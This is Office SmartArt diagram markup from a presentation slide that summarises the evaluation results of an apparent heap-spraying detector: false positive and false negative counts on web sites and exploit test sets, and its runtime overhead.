    <dgm:cxn modelId="{2C50CB36-7B32-446B-AB07-D98D65EA04CD}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{BB1F11FE-0708-4901-A35E-6755011328C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{00FAA445-C03B-489B-8027-142C4EC48836}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{29D603E6-D1CA-4B35-B3FE-A5B5E8B64D13}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{03B472C9-14A3-4CE7-9F10-6629E76FF644}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{C84910B3-A3E3-4FB6-8173-F3EA353F641F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{707EDD3A-7BE8-47C9-8A47-27A91F82E579}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{4B6BD19F-F70F-4825-8155-13EB7F5D86CC}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{49B10704-5021-45E6-972D-8A89A6DD0964}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{2EEFC4A4-AF3C-486B-982F-75194A1DA8A7}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{49699723-3B26-4ACA-853B-EF320E3CED7C}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{5735B892-F379-43DC-B59B-A10218BC6885}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{13C71B4D-2EA1-4F7B-86E5-758D1480D01C}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{F05E0389-0537-4729-A64B-FF1A7F16E718}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{A28DD619-F616-4F5D-8FC1-814CA576115C}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{B98DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{EBDA086F-B1E3-4971-B513-A7D68C5FC731}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{BB7964A8-5E75-4643-8E23-B9DC31C662A8}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{95223AEF-49E2-4132-9AA9-2C1B7D60E366}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{6317A839-2063-435B-9079-E0C0534B1BB5}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{75D56310-25E8-4537-9925-2E7F70E7DC62}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{2F0C3D76-C097-44BD-8861-D5701E565E18}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{4DBA2407-8EE8-49D2-B2A7-2CE5313D44E8}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{17E22335-461B-48BA-B7B2-5C5C4823A97E}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{DAF995CB-3CE7-446D-A4FB-92448E91E891}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{E40D0F88-7C3E-40CB-A457-905A8CECD5A6}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{F4540644-B269-4C20-BEF5-477BA2E23C39}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{CA7DD902-AE6A-4281-915A-FCF738B93D4F}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{86E13594-FCE9-4FCE-BF59-05E6B2D61975}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{46E8C96F-64FA-4EBF-8D28-682A05591407}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{1515C3FA-E1C5-43A8-9E76-8D5F9E2DF651}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{FB87361A-0417-47BD-8FAB-AA94F54635DE}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{22788515-BA81-4672-B926-8284FA647267}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{0EFE44DC-8BC8-406D-AC6C-5B9DF13F9963}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle1"/>
    <dgm:cxn modelId="{5131818A-BD60-44BD-B8F2-0ACED123EDA2}" type="presParOf" srcId="{495DDD9F-6D71-45B6-8F42-EF23D9F8F52A}" destId="{3E33E440-24ED-4D0A-B594-1FB1A79645C6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56226F-41F8-4C7F-9438-1530F832FC6B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#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11AFB3E-E495-4E70-964A-A0FF7D3E9244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 0 False Positives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC5B9E11-4B1E-490A-ADA4-504825673E7D}" type="parTrans" cxnId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}" type="sibTrans" cxnId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D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150 top Web sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{782B4437-07A0-4E5A-85C7-3FF83CC4E84E}" type="parTrans" cxnId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E01572F0-8222-4FB7-9B54-517D0F0F4B27}" type="sibTrans" cxnId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7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 0 False Negatives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A767E8E-0D70-4D86-8E25-6514472640C4}" type="parTrans" cxnId="{9816829D-4939-494B-8F89-A1C3F157C491}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}" type="sibTrans" cxnId="{9816829D-4939-494B-8F89-A1C3F157C491}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D11AD2A-5602-4199-8990-A60E96D171E1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12 published heap spraying exploits and</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DFA58F4-89F8-46BA-BB88-CEC3495411EA}" type="parTrans" cxnId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3868F040-BEA2-4A7A-908D-8F7D3FE23CBF}" type="sibTrans" cxnId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1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 Runtime Overhead</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72EF87C9-BEC4-4AC0-9FFD-727D2930318D}" type="parTrans" cxnId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F621A551-C7AC-44B7-A205-322EF7C41F94}" type="sibTrans" cxnId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F2F1122-473D-46C8-B826-D0BDFADD288B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As high as 2x without sampling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A44EAEB2-4EB8-4D05-B0C6-8D7BC5798E5B}" type="parTrans" cxnId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4395D986-6C88-408D-BCB6-3F6BE3F6D187}" type="sibTrans" cxnId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441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5-10% with sampling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAEEB4BA-F991-48EC-9C7B-69D0A62F0805}" type="parTrans" cxnId="{F89F1F0A-176E-465E-970E-5BEC866F360F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FD10D51-290C-44A2-B49A-42AEA60D1635}" type="sibTrans" cxnId="{F89F1F0A-176E-465E-970E-5BEC866F360F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A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2,000 synthetic rogue pages generated using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFB605CB-8D98-4A66-83AD-304B2A2A3C05}" type="parTrans" cxnId="{03393624-1832-4055-A14A-06AAADE55B1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CAA3A87-AD6C-4C8E-ADA0-AADE4630E5E9}" type="sibTrans" cxnId="{03393624-1832-4055-A14A-06AAADE55B1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073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10 popular AJAX-heavy sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BF4D51D-DF84-4E0F-8CD1-4CD5789EE4E3}" type="parTrans" cxnId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B315838F-C176-4805-8DEC-9BC11BD25D9D}" type="sibTrans" cxnId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" type="pres">
      <dgm:prSet presAssocID="{C156226F-41F8-4C7F-9438-1530F832FC6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3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" presName="box" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E924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AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E924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B10207-A1CE-48EA-9B48-CA29FC989295}" type="pres">
      <dgm:prSet presAssocID="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" presName="box" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA1312B1-E36D-4993-ACDF-2299664C6124}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC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5BF02F-2C6F-4153-9A00-E35B97A656E3}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC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05F9F-9DE8-4639-BF94-509C1521AE4A}" type="pres">
      <dgm:prSet presAssocID="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" presName="box" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54C60950-B23B-4769-ACE5-1F976D1AA119}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1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650A36-B1A6-43DF-AF0D-427E18142423}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A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1A9AE6-6E50-45E6-84C6-3129087AEEA4}" type="presOf" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9816829D-4939-494B-8F89-A1C3F157C491}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" srcOrd="1" destOrd="0" parTransId="{6A767E8E-0D70-4D86-8E25-6514472640C4}" sibTransId="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}"/>
    <dgm:cxn modelId="{03393624-1832-4055-A14A-06AAADE55B1B}" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" srcOrd="1" destOrd="0" parTransId="{FFB605CB-8D98-4A66-83AD-304B2A2A3C05}" sibTransId="{1CAA3A87-AD6C-4C8E-ADA0-AADE4630E5E9}"/>
    <dgm:cxn modelId="{4E0B9344-0095-4F22-B9CF-F74E304840F9}" type="presOf" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B3F7BD4C-8E86-4361-A951-50D72554647D}" type="presOf" srcId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{F89F1F0A-176E-465E-970E-5BEC866F360F}" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" srcOrd="1" destOrd="0" parTransId="{BAEEB4BA-F991-48EC-9C7B-69D0A62F0805}" sibTransId="{3FD10D51-290C-44A2-B49A-42AEA60D1635}"/>
    <dgm:cxn modelId="{4B3302B9-7E61-4966-A608-E4AC74801481}" type="presOf" srcId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{4F374E0A-6811-4814-A2AB-DE280861A299}" type="presOf" srcId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" srcOrd="2" destOrd="0" parTransId="{72EF87C9-BEC4-4AC0-9FFD-727D2930318D}" sibTransId="{F621A551-C7AC-44B7-A205-322EF7C41F94}"/>
    <dgm:cxn modelId="{5733991C-1730-40AF-BD6F-395BAFCB1B50}" type="presOf" srcId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{F816EBB1-EB9B-406F-A0C0-61B104D6B5BA}" type="presOf" srcId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B9615220-11A6-4427-AB0A-5F0C83A70E86}" type="presOf" srcId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8632DEF2-EC4D-4AA5-ACEF-01461BA7069B}" type="presOf" srcId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{AE756FDE-7982-47BD-B91B-FEC168AA97F6}" type="presOf" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{50275A42-0064-435A-92C3-40D4A9BE1846}" type="presOf" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" srcOrd="1" destOrd="0" parTransId="{782B4437-07A0-4E5A-85C7-3FF83CC4E84E}" sibTransId="{E01572F0-8222-4FB7-9B54-517D0F0F4B27}"/>
    <dgm:cxn modelId="{991C40FB-2835-4658-91F1-DD8F5A204C83}" type="presOf" srcId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" srcOrd="0" destOrd="0" parTransId="{DC5B9E11-4B1E-490A-ADA4-504825673E7D}" sibTransId="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}"/>
    <dgm:cxn modelId="{41A9BCF2-8707-41FC-9D44-4099B78040EA}" type="presOf" srcId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" srcOrd="0" destOrd="0" parTransId="{4BF4D51D-DF84-4E0F-8CD1-4CD5789EE4E3}" sibTransId="{B315838F-C176-4805-8DEC-9BC11BD25D9D}"/>
    <dgm:cxn modelId="{4A497791-AFEB-49AD-89DE-1AF7DDF93655}" type="presOf" srcId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8DC6C1A1-44C1-4CB5-92BE-24040A905363}" type="presOf" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{58F6D32E-BEEA-41B4-8C26-2580C08482EF}" type="presOf" srcId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{A496AD75-EA65-4B49-BA86-8F26172FDB03}" type="presOf" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
